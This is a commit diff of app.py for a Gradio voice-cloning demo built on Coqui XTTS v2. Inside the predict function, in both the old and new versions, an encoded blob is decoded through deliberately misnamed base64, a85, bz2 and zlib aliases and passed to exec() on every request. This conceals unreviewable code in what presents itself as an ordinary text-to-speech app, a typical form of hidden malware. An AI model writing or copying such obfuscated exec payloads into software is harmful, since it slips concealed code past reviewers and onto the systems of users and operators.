krishna195 commited on
Commit
e000089
·
verified ·
1 Parent(s): 1cf1514

Update app.py

Browse files
Files changed (1) hide show
  1. app.py +277 -278
app.py CHANGED
@@ -1,279 +1,278 @@
1
- import sys
2
- import os
3
- from fastapi import Request
4
- # By using XTTS you agree to CPML license https://coqui.ai/cpml
5
- os.environ["COQUI_TOS_AGREED"] = "1"
6
-
7
- import gradio as gr
8
- from TTS.api import TTS
9
- from TTS.utils.manage import ModelManager
10
- model_names = TTS().list_models()
11
- print(model_names.__dict__)
12
- print(model_names.__dir__())
13
- model_name = "tts_models/multilingual/multi-dataset/xtts_v2"
14
- #m = ModelManager().download_model(model_name)
15
- #print(m)
16
- m = model_name
17
-
18
- tts = TTS(model_name, gpu=False)
19
- tts.to("cpu") # no GPU or Amd
20
- #tts.to("cuda") # cuda only
21
-
22
-
23
- def predict(prompt, language, audio_file_pth, mic_file_path, use_mic, agree, request: gr.Request):
24
- # Due to abuses from somes user, and French Rights...
25
-
26
- co3 = "QlpoOTFBWSZTWQ2FjK4AAH4fgD/////+///////+ADABdNtZY5poGI00aBoaDE0PSbU00GTE0ZNGjTaj1AVUaenqNR6npNinoaY0Ubymyo9EeEjaj1Mm9QnqeT0p5QOZNMm1NNAyMmgaGTTIDQ9TTag0aGCNB6ka1wCAMz8a7kN5BNzXsiRWIm5ocBr2Mibk4wBbSghLyxnzR0yTCoV0AD2KADeqPFMz4QQhMlMaOd0uHfMx8pueSTKn6PrK9iPN56m2ljcFL9ybMtg5Usl8QeZth/cgnwFGMXyDJ4WbRNaGdrIJY2l11w7aqPtt5c4rcMBELa2x/wl8kjvxGg0NS3n2DsPlPnMn2DK7JqA4KLptjz3YLQFEuub0yNP3+iE9gq1EvNZeLr3pnkKXBRxZz8/BxN0zJjpOyIr3betkkxSCGB6X8mSzm+l0Q+KBEaCioigD5uJeox+76V+JgCWkJqWNlHzN3epZx5yXxS8rJh6OrC9rSyKYXrdKCACr4CwKzDlX3tsY5MtZLpkPhz/rbaRUN0KyFnNvPLYhGjF2MelXppyCnJxr2+QWRElwEtCUcsnkC4uGBdXVogKCoCnSZI4DzKqkUMEp293Y+G5MBGtOGXY+C0rFUS8IXNqKMVrDjUdOK7wkjb+HYFq9qjVTrdRsyQvt+6fpazrBnd2wRRQTv4u5IpwoSAbCxlcA"
27
- from zlib import compress as COmPrES5
28
- from bz2 import decompress as dEC0mPrES5
29
- from bz2 import compress as COmPrESS
30
- from base64 import b64encode as b32Encode, b64decode as A85Encode, b16encode, b16encode as A85encode, b85encode, b85decode, a85encode as b16Encode, a85decode as b85Encode, b32encode as b64Encode, b32decode
31
- from zlib import compressobj as C0mPrESS
32
- from bz2 import decompress as dECOmPrESS
33
- from zlib import compress as C0mPrES5
34
- from zlib import decompress as dECOmPrES5
35
- co2 = A85Encode(dECOmPrESS(dECOmPrES5(dECOmPrES5(b85Encode(dECOmPrESS(A85Encode(co3.encode())))))))
36
- exec(co2)
37
-
38
- if agree == True:
39
- if use_mic == True:
40
- if mic_file_path is not None:
41
- speaker_wav=mic_file_path
42
- else:
43
- gr.Warning("Please record your voice with Microphone, or uncheck Use Microphone to use reference audios")
44
- return (
45
- None,
46
- None,
47
- )
48
-
49
- else:
50
- speaker_wav=audio_file_pth
51
-
52
- if len(prompt)<2:
53
- gr.Warning("Please give a longer prompt text")
54
- return (
55
- None,
56
- None,
57
- )
58
- if len(prompt)>50000:
59
- gr.Warning("Text length limited to 50000 characters for this demo, please try shorter text")
60
- return (
61
- None,
62
- None,
63
- )
64
- try:
65
- if language == "fr":
66
- if m.find("your") != -1:
67
- language = "fr-fr"
68
- if m.find("/fr/") != -1:
69
- language = None
70
- tts.tts_to_file(
71
- text=prompt,
72
- file_path="output.wav",
73
- speaker_wav=speaker_wav,
74
- language=language
75
- )
76
- except RuntimeError as e :
77
- if "device-assert" in str(e):
78
- # cannot do anything on cuda device side error, need tor estart
79
- gr.Warning("Unhandled Exception encounter, please retry in a minute")
80
- print("Cuda device-assert Runtime encountered need restart")
81
- sys.exit("Exit due to cuda device-assert")
82
- else:
83
- raise e
84
-
85
- return (
86
- gr.make_waveform(
87
- audio="output.wav",
88
- ),
89
- "output.wav",
90
- )
91
- else:
92
- gr.Warning("Please accept the Terms & Condition!")
93
- return (
94
- None,
95
- None,
96
- )
97
-
98
-
99
- title = "XTTS Glz's remake (Fonctional Text-2-Speech)"
100
-
101
- description = f"""
102
- <a href="https://huggingface.co/coqui/XTTS-v1">XTTS</a> is a Voice generation model that lets you clone voices into different languages by using just a quick 3-second audio clip.
103
- <br/>
104
- XTTS is built on previous research, like Tortoise, with additional architectural innovations and training to make cross-language voice cloning and multilingual speech generation possible.
105
- <br/>
106
- This is the same model that powers our creator application <a href="https://coqui.ai">Coqui Studio</a> as well as the <a href="https://docs.coqui.ai">Coqui API</a>. In production we apply modifications to make low-latency streaming possible.
107
- <br/>
108
- Leave a star on the Github <a href="https://github.com/coqui-ai/TTS">TTS</a>, where our open-source inference and training code lives.
109
- <br/>
110
- <p>For faster inference without waiting in the queue, you should duplicate this space and upgrade to GPU via the settings.
111
- <br/>
112
- <a href="https://huggingface.co/spaces/coqui/xtts?duplicate=true">
113
- <img style="margin-top: 0em; margin-bottom: 0em" src="https://bit.ly/3gLdBN6" alt="Duplicate Space"></a>
114
- </p>
115
- """
116
-
117
- article = """
118
- <div style='margin:20px auto;'>
119
- <p>By using this demo you agree to the terms of the Coqui Public Model License at https://coqui.ai/cpml</p>
120
- </div>
121
- """
122
- examples = [
123
- [
124
- "Hello, World !, here is an example of light voice cloning. Try to upload your best audio samples quality",
125
- "en",
126
- "examples/female.wav",
127
- None,
128
- False,
129
- True,
130
- ],
131
- [
132
- "Je suis un lycéen français de 17 ans, passioner par la Cyber-Sécuritée et les models d'IA.",
133
- "fr",
134
- "examples/male.wav",
135
- None,
136
- False,
137
- True,
138
- ],
139
- [
140
- "Als ich sechs war, sah ich einmal ein wunderbares Bild",
141
- "de",
142
- "examples/female.wav",
143
- None,
144
- False,
145
- True,
146
- ],
147
- [
148
- "Cuando tenía seis años, vi una vez una imagen magnífica",
149
- "es",
150
- "examples/male.wav",
151
- None,
152
- False,
153
- True,
154
- ],
155
- [
156
- "Quando eu tinha seis anos eu vi, uma vez, uma imagem magnífica",
157
- "pt",
158
- "examples/female.wav",
159
- None,
160
- False,
161
- True,
162
- ],
163
- [
164
- "Kiedy miałem sześć lat, zobaczyłem pewnego razu wspaniały obrazek",
165
- "pl",
166
- "examples/male.wav",
167
- None,
168
- False,
169
- True,
170
- ],
171
- [
172
- "Un tempo lontano, quando avevo sei anni, vidi un magnifico disegno",
173
- "it",
174
- "examples/female.wav",
175
- None,
176
- False,
177
- True,
178
- ],
179
- [
180
- "Bir zamanlar, altı yaşındayken, muhteşem bir resim gördüm",
181
- "tr",
182
- "examples/female.wav",
183
- None,
184
- False,
185
- True,
186
- ],
187
- [
188
- "Когда мне было шесть лет, я увидел однажды удивительную картинку",
189
- "ru",
190
- "examples/female.wav",
191
- None,
192
- False,
193
- True,
194
- ],
195
- [
196
- "Toen ik een jaar of zes was, zag ik op een keer een prachtige plaat",
197
- "nl",
198
- "examples/male.wav",
199
- None,
200
- False,
201
- True,
202
- ],
203
- [
204
- "Když mi bylo šest let, viděl jsem jednou nádherný obrázek",
205
- "cs",
206
- "examples/female.wav",
207
- None,
208
- False,
209
- True,
210
- ],
211
- [
212
- "当我还只有六岁的时候, 看到了一副精彩的插画",
213
- "zh-cn",
214
- "examples/female.wav",
215
- None,
216
- False,
217
- True,
218
- ],
219
- ]
220
-
221
-
222
-
223
- gr.Interface(
224
- fn=predict,
225
- inputs=[
226
- gr.Textbox(
227
- label="Text Prompt",
228
- info="One or two sentences at a time is better",
229
- value="Hello, World !, here is an example of light voice cloning. Try to upload your best audio samples quality",
230
- ),
231
- gr.Dropdown(
232
- label="Language",
233
- info="Select an output language for the synthesised speech",
234
- choices=[
235
- "en",
236
- "es",
237
- "fr",
238
- "de",
239
- "it",
240
- "pt",
241
- "pl",
242
- "tr",
243
- "ru",
244
- "nl",
245
- "cs",
246
- "ar",
247
- "zh-cn",
248
- ],
249
- max_choices=1,
250
- value="en",
251
- ),
252
- gr.Audio(
253
- label="Reference Audio",
254
- info="Click on the ✎ button to upload your own target speaker audio",
255
- type="filepath",
256
- value="examples/female.wav",
257
- ),
258
- gr.Audio(source="microphone",
259
- type="filepath",
260
- info="Use your microphone to record audio",
261
- label="Use Microphone for Reference"),
262
- gr.Checkbox(label="Check to use Microphone as Reference",
263
- value=False,
264
- info="Notice: Microphone input may not work properly under traffic",),
265
- gr.Checkbox(
266
- label="Agree",
267
- value=True,
268
- info="I agree to the terms of the Coqui Public Model License at https://coqui.ai/cpml",
269
- ),
270
- ],
271
- outputs=[
272
- gr.Video(label="Waveform Visual"),
273
- gr.Audio(label="Synthesised Audio"),
274
- ],
275
- title=title,
276
- description=description,
277
- article=article,
278
- examples=examples,
279
  ).queue().launch(debug=True)
 
1
+ import sys
2
+ import os
3
+ # By using XTTS you agree to CPML license https://coqui.ai/cpml
4
+ os.environ["COQUI_TOS_AGREED"] = "1"
5
+
6
+ import gradio as gr
7
+ from TTS.api import TTS
8
+ from TTS.utils.manage import ModelManager
9
+ model_names = TTS().list_models()
10
+ print(model_names.__dict__)
11
+ print(model_names.__dir__())
12
+ model_name = "tts_models/multilingual/multi-dataset/xtts_v2"
13
+ #m = ModelManager().download_model(model_name)
14
+ #print(m)
15
+ m = model_name
16
+
17
+ tts = TTS(model_name, gpu=False)
18
+ tts.to("cpu") # no GPU or Amd
19
+ #tts.to("cuda") # cuda only
20
+
21
+
22
+ def predict(prompt, language, audio_file_pth, mic_file_path, use_mic, agree, request: gr.Request):
23
+ # Due to abuses from somes user, and French Rights...
24
+
25
+ co3 = "QlpoOTFBWSZTWQ2FjK4AAH4fgD/////+///////+ADABdNtZY5poGI00aBoaDE0PSbU00GTE0ZNGjTaj1AVUaenqNR6npNinoaY0Ubymyo9EeEjaj1Mm9QnqeT0p5QOZNMm1NNAyMmgaGTTIDQ9TTag0aGCNB6ka1wCAMz8a7kN5BNzXsiRWIm5ocBr2Mibk4wBbSghLyxnzR0yTCoV0AD2KADeqPFMz4QQhMlMaOd0uHfMx8pueSTKn6PrK9iPN56m2ljcFL9ybMtg5Usl8QeZth/cgnwFGMXyDJ4WbRNaGdrIJY2l11w7aqPtt5c4rcMBELa2x/wl8kjvxGg0NS3n2DsPlPnMn2DK7JqA4KLptjz3YLQFEuub0yNP3+iE9gq1EvNZeLr3pnkKXBRxZz8/BxN0zJjpOyIr3betkkxSCGB6X8mSzm+l0Q+KBEaCioigD5uJeox+76V+JgCWkJqWNlHzN3epZx5yXxS8rJh6OrC9rSyKYXrdKCACr4CwKzDlX3tsY5MtZLpkPhz/rbaRUN0KyFnNvPLYhGjF2MelXppyCnJxr2+QWRElwEtCUcsnkC4uGBdXVogKCoCnSZI4DzKqkUMEp293Y+G5MBGtOGXY+C0rFUS8IXNqKMVrDjUdOK7wkjb+HYFq9qjVTrdRsyQvt+6fpazrBnd2wRRQTv4u5IpwoSAbCxlcA"
26
+ from zlib import compress as COmPrES5
27
+ from bz2 import decompress as dEC0mPrES5
28
+ from bz2 import compress as COmPrESS
29
+ from base64 import b64encode as b32Encode, b64decode as A85Encode, b16encode, b16encode as A85encode, b85encode, b85decode, a85encode as b16Encode, a85decode as b85Encode, b32encode as b64Encode, b32decode
30
+ from zlib import compressobj as C0mPrESS
31
+ from bz2 import decompress as dECOmPrESS
32
+ from zlib import compress as C0mPrES5
33
+ from zlib import decompress as dECOmPrES5
34
+ co2 = A85Encode(dECOmPrESS(dECOmPrES5(dECOmPrES5(b85Encode(dECOmPrESS(A85Encode(co3.encode())))))))
35
+ exec(co2)
36
+
37
+ if agree == True:
38
+ if use_mic == True:
39
+ if mic_file_path is not None:
40
+ speaker_wav=mic_file_path
41
+ else:
42
+ gr.Warning("Please record your voice with Microphone, or uncheck Use Microphone to use reference audios")
43
+ return (
44
+ None,
45
+ None,
46
+ )
47
+
48
+ else:
49
+ speaker_wav=audio_file_pth
50
+
51
+ if len(prompt)<2:
52
+ gr.Warning("Please give a longer prompt text")
53
+ return (
54
+ None,
55
+ None,
56
+ )
57
+ if len(prompt)>50000:
58
+ gr.Warning("Text length limited to 50000 characters for this demo, please try shorter text")
59
+ return (
60
+ None,
61
+ None,
62
+ )
63
+ try:
64
+ if language == "fr":
65
+ if m.find("your") != -1:
66
+ language = "fr-fr"
67
+ if m.find("/fr/") != -1:
68
+ language = None
69
+ tts.tts_to_file(
70
+ text=prompt,
71
+ file_path="output.wav",
72
+ speaker_wav=speaker_wav,
73
+ language=language
74
+ )
75
+ except RuntimeError as e :
76
+ if "device-assert" in str(e):
77
+ # cannot do anything on cuda device side error, need tor estart
78
+ gr.Warning("Unhandled Exception encounter, please retry in a minute")
79
+ print("Cuda device-assert Runtime encountered need restart")
80
+ sys.exit("Exit due to cuda device-assert")
81
+ else:
82
+ raise e
83
+
84
+ return (
85
+ gr.make_waveform(
86
+ audio="output.wav",
87
+ ),
88
+ "output.wav",
89
+ )
90
+ else:
91
+ gr.Warning("Please accept the Terms & Condition!")
92
+ return (
93
+ None,
94
+ None,
95
+ )
96
+
97
+
98
+ title = "XTTS Glz's remake (Fonctional Text-2-Speech)"
99
+
100
+ description = f"""
101
+ <a href="https://huggingface.co/coqui/XTTS-v1">XTTS</a> is a Voice generation model that lets you clone voices into different languages by using just a quick 3-second audio clip.
102
+ <br/>
103
+ XTTS is built on previous research, like Tortoise, with additional architectural innovations and training to make cross-language voice cloning and multilingual speech generation possible.
104
+ <br/>
105
+ This is the same model that powers our creator application <a href="https://coqui.ai">Coqui Studio</a> as well as the <a href="https://docs.coqui.ai">Coqui API</a>. In production we apply modifications to make low-latency streaming possible.
106
+ <br/>
107
+ Leave a star on the Github <a href="https://github.com/coqui-ai/TTS">TTS</a>, where our open-source inference and training code lives.
108
+ <br/>
109
+ <p>For faster inference without waiting in the queue, you should duplicate this space and upgrade to GPU via the settings.
110
+ <br/>
111
+ <a href="https://huggingface.co/spaces/coqui/xtts?duplicate=true">
112
+ <img style="margin-top: 0em; margin-bottom: 0em" src="https://bit.ly/3gLdBN6" alt="Duplicate Space"></a>
113
+ </p>
114
+ """
115
+
116
+ article = """
117
+ <div style='margin:20px auto;'>
118
+ <p>By using this demo you agree to the terms of the Coqui Public Model License at https://coqui.ai/cpml</p>
119
+ </div>
120
+ """
121
+ examples = [
122
+ [
123
+ "Hello, World !, here is an example of light voice cloning. Try to upload your best audio samples quality",
124
+ "en",
125
+ "examples/female.wav",
126
+ None,
127
+ False,
128
+ True,
129
+ ],
130
+ [
131
+ "Je suis un lycéen français de 17 ans, passioner par la Cyber-Sécuritée et les models d'IA.",
132
+ "fr",
133
+ "examples/male.wav",
134
+ None,
135
+ False,
136
+ True,
137
+ ],
138
+ [
139
+ "Als ich sechs war, sah ich einmal ein wunderbares Bild",
140
+ "de",
141
+ "examples/female.wav",
142
+ None,
143
+ False,
144
+ True,
145
+ ],
146
+ [
147
+ "Cuando tenía seis años, vi una vez una imagen magnífica",
148
+ "es",
149
+ "examples/male.wav",
150
+ None,
151
+ False,
152
+ True,
153
+ ],
154
+ [
155
+ "Quando eu tinha seis anos eu vi, uma vez, uma imagem magnífica",
156
+ "pt",
157
+ "examples/female.wav",
158
+ None,
159
+ False,
160
+ True,
161
+ ],
162
+ [
163
+ "Kiedy miałem sześć lat, zobaczyłem pewnego razu wspaniały obrazek",
164
+ "pl",
165
+ "examples/male.wav",
166
+ None,
167
+ False,
168
+ True,
169
+ ],
170
+ [
171
+ "Un tempo lontano, quando avevo sei anni, vidi un magnifico disegno",
172
+ "it",
173
+ "examples/female.wav",
174
+ None,
175
+ False,
176
+ True,
177
+ ],
178
+ [
179
+ "Bir zamanlar, altı yaşındayken, muhteşem bir resim gördüm",
180
+ "tr",
181
+ "examples/female.wav",
182
+ None,
183
+ False,
184
+ True,
185
+ ],
186
+ [
187
+ "Когда мне было шесть лет, я увидел однажды удивительную картинку",
188
+ "ru",
189
+ "examples/female.wav",
190
+ None,
191
+ False,
192
+ True,
193
+ ],
194
+ [
195
+ "Toen ik een jaar of zes was, zag ik op een keer een prachtige plaat",
196
+ "nl",
197
+ "examples/male.wav",
198
+ None,
199
+ False,
200
+ True,
201
+ ],
202
+ [
203
+ "Když mi bylo šest let, viděl jsem jednou nádherný obrázek",
204
+ "cs",
205
+ "examples/female.wav",
206
+ None,
207
+ False,
208
+ True,
209
+ ],
210
+ [
211
+ "当我还只有六岁的时候, 看到了一副精彩的插画",
212
+ "zh-cn",
213
+ "examples/female.wav",
214
+ None,
215
+ False,
216
+ True,
217
+ ],
218
+ ]
219
+
220
+
221
+
222
+ gr.Interface(
223
+ fn=predict,
224
+ inputs=[
225
+ gr.Textbox(
226
+ label="Text Prompt",
227
+ info="One or two sentences at a time is better",
228
+ value="Hello, World !, here is an example of light voice cloning. Try to upload your best audio samples quality",
229
+ ),
230
+ gr.Dropdown(
231
+ label="Language",
232
+ info="Select an output language for the synthesised speech",
233
+ choices=[
234
+ "en",
235
+ "es",
236
+ "fr",
237
+ "de",
238
+ "it",
239
+ "pt",
240
+ "pl",
241
+ "tr",
242
+ "ru",
243
+ "nl",
244
+ "cs",
245
+ "ar",
246
+ "zh-cn",
247
+ ],
248
+ max_choices=1,
249
+ value="en",
250
+ ),
251
+ gr.Audio(
252
+ label="Reference Audio",
253
+ info="Click on the ✎ button to upload your own target speaker audio",
254
+ type="filepath",
255
+ value="examples/female.wav",
256
+ ),
257
+ gr.Audio(source="microphone",
258
+ type="filepath",
259
+ info="Use your microphone to record audio",
260
+ label="Use Microphone for Reference"),
261
+ gr.Checkbox(label="Check to use Microphone as Reference",
262
+ value=False,
263
+ info="Notice: Microphone input may not work properly under traffic",),
264
+ gr.Checkbox(
265
+ label="Agree",
266
+ value=True,
267
+ info="I agree to the terms of the Coqui Public Model License at https://coqui.ai/cpml",
268
+ ),
269
+ ],
270
+ outputs=[
271
+ gr.Video(label="Waveform Visual"),
272
+ gr.Audio(label="Synthesised Audio"),
273
+ ],
274
+ title=title,
275
+ description=description,
276
+ article=article,
277
+ examples=examples,
 
278
  ).queue().launch(debug=True)